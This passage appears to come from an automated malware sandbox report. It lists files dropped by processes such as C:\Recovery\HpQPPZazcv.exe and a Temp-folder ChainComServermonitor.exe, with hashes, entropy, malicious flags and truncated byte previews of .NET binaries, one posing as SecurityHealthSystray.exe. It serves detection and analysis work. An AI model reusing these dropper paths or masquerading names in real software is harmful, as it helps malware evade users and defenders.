                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41472
                                                                  Entropy (8bit):5.6808219961645605
                                                                  Encrypted:false
                                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34816
                                                                  Entropy (8bit):5.636032516496583
                                                                  Encrypted:false
                                                                  SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                                  MD5:996BD447A16F0A20F238A611484AFE86
                                                                  SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                                  SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                                  SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                                  Process:C:\Recovery\HpQPPZazcv.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with very long lines (587), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):587
                                                                  Entropy (8bit):5.884124676677957
                                                                  Encrypted:false
                                                                  SSDEEP:12:w/WJdLjpKfGVsOx707vqH8MTeS+twsw403r7bESzUCXa:mWJdL/s+uCH84eS+tr27bvXa
                                                                  MD5:DD2454E0B536E02BD04FC1399E6BC9AF
                                                                  SHA1:49200D7D5BD2F0416870B4282CB37C623D1C5C53
                                                                  SHA-256:1554ED8C7EF88C1CFAEB96401477CB5CFFD81B5DA7289303853A1A842D09BC40
                                                                  SHA-512:5C95563CD96A1D26B96B974F389502DAE89C034919F8D27B2C2F2147682BA0BCA29F358DA96E9337825A7D6E0C2710442D6D7C946BEA63B2149EB0016AFE8B18
                                                                  Malicious:false
                                                                  Preview:QlYtKW6XEOfPEEXXnlaxWoiHDPSgWbSYdGA3fhUGwjhQDMSpiEtSwvNmCQp5EZBm6Gv7Ed1GQTAwGSE06m7Sr9ls3Y0P1YCWh4T7bVlFNnCduafuMz9cct46eDEpmlO1RoPM8GZlA2FE7I7c2GDCZj4y9XcYQ5clYKMGLTwFZYbjo09WFmwgiMbrtaMloBUEadpx61QjU8mBHUJJXGSoI6DMseXuGLaYDWJKLMZOVNLjkZjYRCNhsq6dadEbefcJhN8vL88LqES5udlS48dE72qXaqurH8u0uCCXbyNSEB1nXAs61vhfBYLogkUfNQDsUbLsbO0GvLA6BDAZ7y0WaOyW0X11erEx7IS5zAfn4bt0XOnck4iZarRFnz1DX9lDGN82uEk6TMb9e88luYRjJpWP1NSAIbQ5zqtKPusfTlFOQRko0PS9rC3b0tBhvky15fKyPxVApvPijH8jmoJ3IROwwRUgtLutxOSvGwYD3ST5wU2sub4Ha5soRYB7dzQeBfvVzNd0PF907SAbZlwSQnT2foesuakECz4Qjh3g8D1U52q8Xji2D8NXM3zLtuGyf4yIXt22rPU
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3720704
                                                                  Entropy (8bit):7.733352681119499
                                                                  Encrypted:false
                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:MSVC .res
                                                                  Category:dropped
                                                                  Size (bytes):1224
                                                                  Entropy (8bit):4.435108676655666
                                                                  Encrypted:false
                                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                  Malicious:false
                                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):4608
                                                                  Entropy (8bit):3.9234125583554786
                                                                  Encrypted:false
                                                                  SSDEEP:48:60pLPt2M7Jt8Bs3FJsdcV4MKe27vvqBHuOulajfqXSfbNtm:7PVPc+Vx9MvvkIcjRzNt
                                                                  MD5:7BB479BD5A9F1E01606AD74569B9E52F
                                                                  SHA1:C0FAA32D2EBE2FAFB8A07CAB732E36C6BE6E8F66
                                                                  SHA-256:A948CA338AC996677D681741C15888ECF0FABCD1C5B66DC5848C94C09DA6BF53
                                                                  SHA-512:B7D427B68F9E442AB6D8FF401455277C7870CE64A472BF9CCF5E4FD3E82C9CFFE5485DF0B8502CCACEE43F62C22DE5F944EFD6335DFBE529884FCB5E0596B76D
                                                                  Malicious:true
